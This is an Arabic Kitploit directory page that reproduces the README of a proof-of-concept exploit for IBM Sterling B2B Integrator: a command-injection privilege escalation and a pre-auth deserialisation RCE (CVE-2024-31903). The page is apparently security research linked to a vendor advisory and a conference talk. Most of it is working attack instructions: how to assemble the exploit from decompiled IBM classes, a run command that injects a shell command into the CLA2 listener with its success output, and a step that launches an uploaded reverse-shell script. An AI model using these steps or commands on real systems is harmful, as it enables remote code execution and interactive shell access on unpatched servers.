Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ibm-sterling-b2b-integrator-poc — كود PoC للهجمات LPE و RCE (CVE-2024-31903) ضد IBM Sterling B2B Integrator | Kitploit
أدوات/GitHubGitHub/reverseclabs/ibm-sterling-b2b-integrator-poc
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةتطوير الحمولاتاستغلال الملفات الثنائية
GitHubreverseclabs/ibm-sterling-b2b-integrator-poc

ibm-sterling-b2b-integrator-poc

كود PoC للهجمات LPE و RCE (CVE-2024-31903) ضد IBM Sterling B2B Integrator

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

IBM Sterling B2B Integrator إثبات المفهوم

كود إثبات المفهوم لاستغلال الثغرات المكتشفة في IBM Sterling B2B Integrator، الإصدارات من 6.2.0.0 إلى 6.2.0.2، ومن 6.0.0.0 إلى 6.1.2.5 لأنظمة Linux وWindows وAIX:

  • LPE Command Injection - إذا تم تعطيل المصادقة
  • Pre-auth Deserialisation RCE - تم تعيينه CVE-2024-31903، راجع النشرة الاستشارية الخاصة بـ IBM هنا: https://www.ibm.com/support/pages/node/7172233

يمكن العثور على مزيد من التفاصيل حول هذه المشكلات في محادثتي في DistricCon بعنوان "To B or not 2B: Breaking the IBM B2B Integrator with, and without authentication":

https://www.districtcon.org/bios-and-talks-2025/to-b-or-not-to-b

هيكل المستودع

يشير معظم هذا الكود في هذا المستودع إلى هجوم LPE command injection.

يمكن استخدام عميل Python الثنائي bin_client.py لإرسال الرسائل يدويًا إلى CLA2، مما يسمح باستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر إلغاء التسلسل (deserialisation).

الاستخدام

root@kitploit:~
$ java Main
$ Usage: Main <cmdLine> <outfile_or_SEND> [host] [port]

يقبل كود إثبات المفهوم معلمتين:

  • أمر الصدفة الذي سيتم تنفيذه بواسطة عميل CLA2 الهدف
  • مسار لكتلة رسالة Java المسلسلة إلى القرص، لتحليلها لاحقًا أو إرسالها يدويًا باستخدام شيء مثل bin_client.py، أو السلسلة النصية "SEND" لإرسالها فورًا إلى host:port حيث يستمع عميل CLA2

التعليمات

يكون الكود المصدري المضمن في هذا المستودع ناقصًا عمدًا، حيث يلزم وجود بعض الفئات من النظام الفرعي CLA2. اعتمادًا على صلاحيات نظام الملفات لدليل التثبيت، قد تتمكن من الوصول إلى ملفات JAR

بافتراض أنك قمت باستخراج الملفات ذات الصلة من فك تجميع JAR. لن يتم تحميلها هنا لأنها تشكل ملكية فكرية لـ IBM

  1. قم بفك تجميع CLA2Client.jar

  2. في الكود المفكك، حدد موقع الملفين CmdLine2Result.java و CmdLine2Parms.java

  3. انسخهما وألصقهما بجانب Main.java لتكرار هيكل الدليل لحزمة جافا الخاصة بالتطبيق الأصلي

root@kitploit:~
/src/com/sterlingcommerce/woodstock/services/cmdline2/
  1. قم بتجميع برنامج إثبات المفهوم - يفضل باستخدام JDK المضمن مع التطبيق
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/javac src/com/sterlingcommerce/woodstock/services/cmdline2/*.java
  1. قم بتشغيله - مرة أخرى، باستخدام JDK المضمن مع التطبيق إذا أمكن
root@kitploit:~
${B2BHOME}/appl/SFG/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main '/bin/sh -c "id > /tmp/result"' SEND 127.0.0.1 5052
[+] Creating object...
[+] Sending object to 127.0.0.1:5052...
[+] ...Sent!
[+] Receiving header...
[+] ...header received: RESULT
[+] Receiving result...
[+] Result received:
##[DEBUG]## CmdLine2Result:
fileSize=0
outputNameLong=null
outputNameShort=null
******* end of CmdLine2Result *******
[+] clr.statusRpt:       null
[+] clr.exceptionString: null
[+] clr.somethingToLog:  CmdLine2Thread.runCommand: cmdLine before execution=/bin/sh -c "id > /tmp/result"
##[REMOTE DEBUG]## parm0=/bin/sh
##[REMOTE DEBUG]## parm1=-c
##[REMOTE DEBUG]## parm2=id > /tmp/result 
  1. (اختياري) للحصول على شل تفاعلي كامل، قم بتحميل السكربتات revshell.py و revshell_listener.py إلى النظام الهدف، وابدأ المستمع. ثم استبدل معلمة الأمر في إثبات المفهوم باستدعاء سكربت الشل العكسي كما يلي:
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main 'python3 /tmp/revshell.py 9090' SEND
تنزيل الأداة